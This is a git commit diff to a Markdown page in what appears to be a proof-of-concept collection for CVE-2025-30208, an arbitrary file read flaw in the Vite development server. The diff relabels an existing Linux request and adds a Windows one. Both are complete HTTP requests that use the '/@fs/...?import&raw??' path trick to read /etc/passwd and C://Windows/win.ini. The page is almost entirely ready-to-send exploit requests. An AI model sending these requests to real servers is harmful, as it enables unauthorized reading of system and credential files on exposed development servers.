Update Vite开发服务器任意文件读取漏洞(CVE-2025-30208).md

2025-05-05 10:17:57 +00:00 · 2025-04-07 11:06:59 +08:00 · 2025-04-07 11:06:59 +08:00 · cced027236
commit cced027236
parent fd59d6c480
1 changed files with 15 additions and 2 deletions
--- a/wpoc/Vite开发服务器/Vite开发服务器任意文件读取漏洞(CVE-2025-30208).md
+++ b/wpoc/Vite开发服务器/Vite开发服务器任意文件读取漏洞(CVE-2025-30208).md
@ -6,7 +6,7 @@
 body="/@vite/client"
 ```

-## POC
+## POC-(Linux)
 ```
 GET /@fs/etc/passwd?import&raw?? HTTP/1.1
 Host: 127.0.0.1
@ -20,7 +20,20 @@ Priority: u=0, i
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 94

-
+```
+## poc-(windows)
+```
+GET /@fs/C://Windows/win.ini?import&raw?? HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 94
 ```
 ## python脚本